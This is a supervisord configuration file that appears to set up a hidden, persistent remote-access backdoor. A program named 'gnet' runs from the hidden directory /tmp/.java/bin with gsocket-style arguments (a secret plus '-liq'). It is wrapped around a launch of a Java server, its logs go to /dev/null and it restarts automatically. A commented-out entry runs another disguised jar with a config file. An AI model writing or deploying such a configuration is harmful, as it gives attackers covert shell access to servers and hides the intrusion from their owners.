[supervisord]
logfile=/dev/null

# [program:app]
# directory=/tmp/.java/bin
# command=./user-patch.jar -c ./conf.json
# stdout_logfile=/dev/null
# autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s b3928cae-d2a1e2c-5a16f98-13d9g8hbj7-56c4a961-ecd9f9440-d6a2803-8a1c5j1g60 -liq"
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true